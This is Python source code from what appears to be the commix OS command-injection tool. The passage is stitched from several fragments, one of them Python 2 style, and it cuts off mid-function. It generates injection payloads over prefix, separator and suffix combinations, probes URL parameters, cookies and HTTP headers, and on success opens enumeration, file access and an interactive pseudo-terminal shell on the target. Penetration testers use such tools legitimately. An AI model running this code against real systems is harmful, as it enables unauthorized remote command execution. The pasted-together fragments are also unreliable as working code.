vulnerable to host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( how_long = tfb_injector.host_injection_test(url, vuln_parameter, payload) # Custom HTTP header injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom HTTP header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) how_long = tfb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic.append(how_long) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if percent == 100 and no_result == True: if settings.VERBOSITY_LEVEL == 0: percent = settings.FAIL_STATUS else: percent = "" else: if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Simple statical analysis statistical_anomaly = True if len(set(how_long_statistic[0:5])) == 1: if max(xrange(len(how_long_statistic)), key=lambda x: how_long_statistic[x]) == len(TAG) - 1: statistical_anomaly = False how_long_statistic = [] if timesec <= how_long and not statistical_anomaly: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning: warn_msg = "Unexpected time delays have been identified due to unstable " warn_msg += "requests. This behavior may lead to false-positive results.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) while True: if not menu.options.batch: question_msg = "How do you want to proceed? [(C)ontinue/(s)kip/(q)uit] > " proceed_option = _input(settings.print_question_msg(question_msg)) else: proceed_option = "" if len(proceed_option) == 0: proceed_option = "c" if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "s": false_positive_fixation = False raise elif proceed_option.lower() == "c": timesec = timesec + 1 false_positive_fixation = True break elif proceed_option.lower() == "q": raise SystemExit() else: err_msg = "'" + proceed_option + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass if settings.VERBOSITY_LEVEL == 0: percent = ".. (" + str(float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec if false_positive_warning: time.sleep(1) randv1 = random.randrange(0, 4) randv2 = random.randrange(1, 5) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" else: cmd = "echo $((" + str(randv1) + " %2B " + str(randv2) + "))" # Set the original delay time original_how_long = how_long # Check for false positive resutls how_long, output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if str(output) == str(randvcalc) and len(TAG) == output_length: possibly_vulnerable = True how_long_statistic = 0 if settings.VERBOSITY_LEVEL == 0: percent = settings.info_msg else: percent = "" #break else: break # False positive else: if settings.VERBOSITY_LEVEL == 0: percent = ".. (" + str(float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: if settings.VERBOSITY_LEVEL == 0: percent = ".. (" + str(float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue if settings.VERBOSITY_LEVEL == 0: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: if settings.VERBOSITY_LEVEL == 0: percent = settings.FAIL_STATUS info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: percent = "" else: percent = ".. (" + str(float_percent) + "%)" print(settings.SINGLE_WHITESPACE) # Print logs notification message logs.logs_notification(filename) #raise else: percent = ".. (" + str(float_percent) + "%)" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if (len(TAG) == output_length) and \ (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level): found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.LOAD_SESSION: if whitespace == "%20": whitespace = " " possibly_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = " Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method != settings.HTTPMETHOD.POST: found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) else: checks.total_of_requests() # Print the findings to terminal. info_msg = "The" if len(found_vuln_parameter) > 0 and not "cookie" in header_name : info_msg += " " + http_request_method info_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name info_msg += found_vuln_parameter + " seems injectable via " info_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print(settings.print_bold_info_msg(info_msg)) sub_content = str(checks.url_decode(payload)) print(settings.print_sub_content(sub_content)) # Export session if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, original_how_long, output_length, is_vulnerable=menu.options.level) #possibly_vulnerable = False else: settings.LOAD_SESSION = False # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.TARGET_OS == "win": time.sleep(1) new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input("\n" + settings.print_question_msg(question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "Y" if enumerate_again in settings.CHOICE_YES: tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print(settings.SINGLE_WHITESPACE) break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.enumeration_options(): tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print(settings.SINGLE_WHITESPACE) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : print(settings.SINGLE_WHITESPACE) while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input(settings.print_question_msg(question_msg)) else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "Y" if file_access_again in settings.CHOICE_YES: tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print(settings.SINGLE_WHITESPACE) tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from temp. if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) logs.print_logs_notification(filename, url) raise SystemExit() if settings.VERBOSITY_LEVEL != 0 or not new_line: print(settings.SINGLE_WHITESPACE) try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input(settings.print_question_msg(question_msg)) else: gotshell = "" if len(gotshell) == 0: gotshell = "Y" if gotshell in settings.CHOICE_YES: # if not menu.options.batch: # print(settings.SINGLE_WHITESPACE) print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if settings.READLINE_ERROR: checks.no_readline_module() while True: if false_positive_warning: warn_msg = "Due to unexpected time delays, it is highly " warn_msg += "recommended to enable the 'reverse_tcp' option.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) false_positive_warning = False if not settings.READLINE_ERROR: checks.tab_autocompleter() cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd(url, cmd, vuln_parameter) # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, output) print("\n" + settings.print_output(output) + "\n") # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, output) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass except KeyboardInterrupt: if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise if no_result == True: if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) return False else : sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "results-based OS command injection" technique = "classic command injection technique" if not settings.LOAD_SESSION: info_msg = "Testing the " + "(" + injection_type.split( " ")[0] + ") " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 1: print "" i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len( settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification( url, technique, injection_type): url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) checks.check_for_stored_tamper(payload) else: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision( separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Check for base64 / hex encoding payload = checks.perform_payload_encoding(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: print settings.print_payload(payload) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) print settings.print_payload(payload) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = cb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = cb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = cb_injector.referer_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) response = cb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test( payload, http_request_method, url) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, delay) # Evaluate test results. shell = cb_injector.injection_test_results( response, TAG, randvcalc) if not settings.VERBOSITY_LEVEL >= 1: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if shell == False: info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "... " + "[ " + float_percent + "%" + " ]" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if float(float_percent) >= 99.9: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.VERBOSITY_LEVEL >= 1 and not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split( " ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub( "%20", " ", re.sub("%2B", "+", payload)) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation( url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. new_line = True if settings.ENUMERATION_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = raw_input( "\n" + settings.print_question_msg( question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) #print "" break elif enumerate_again in settings.CHOICE_NO: new_line = False break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): cb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) if not menu.file_access_options( ) and not menu.options.os_cmd and new_line: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: if settings.ENUMERATION_DONE != True: print "" while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write( settings.print_question_msg( question_msg)) file_access_again = sys.stdin.readline( ).replace("\n", "").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.file_access_options(): if not menu.enumeration_options(): print "" cb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) print "" # Check if defined single cmd. if menu.options.os_cmd: if not menu.file_access_options(): print "" cb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break # if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: # if settings.VERBOSITY_LEVEL >= 1: # print "" if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace( "\n", "").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, delay, go_back_again) if go_back and go_back_again == False: break if go_back and go_back_again: return True else: # Command execution results. response = cb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload( url, delay) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. try: shell = cb_injector.injection_results( response, TAG, cmd) shell = "".join( str(p) for p in shell) except: print "" continue if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd( url, cmd, vuln_parameter) if shell: html_parser = HTMLParser.HTMLParser( ) shell = html_parser.unescape( shell) # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, shell) if shell != "": if settings.VERBOSITY_LEVEL == 1: print "" print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg( err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False possibly_vulnerable = False false_positive_warning = False how_long_statistic = [] export_injection_info = False how_long = 0 injection_type = "semi-blind command injection" technique = "tempfile-based injection technique" # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: err_msg = "The '--url-reload' option is not available in " + technique + "!" print settings.print_critical_msg(err_msg) whitespace = checks.check_whitespaces() if settings.VERBOSITY_LEVEL >= 1: info_msg ="Testing the " + technique + "... " print settings.print_info_msg(info_msg) # Calculate all possible combinations total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION)) for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: if settings.LOAD_SESSION: cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - delay OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" else: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Encode payload to Base64 if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") print settings.print_payload(payload_msg) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) how_long = tfb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic.append(how_long) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if percent == 100 and no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - delay) >= 0) or \ (url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \ 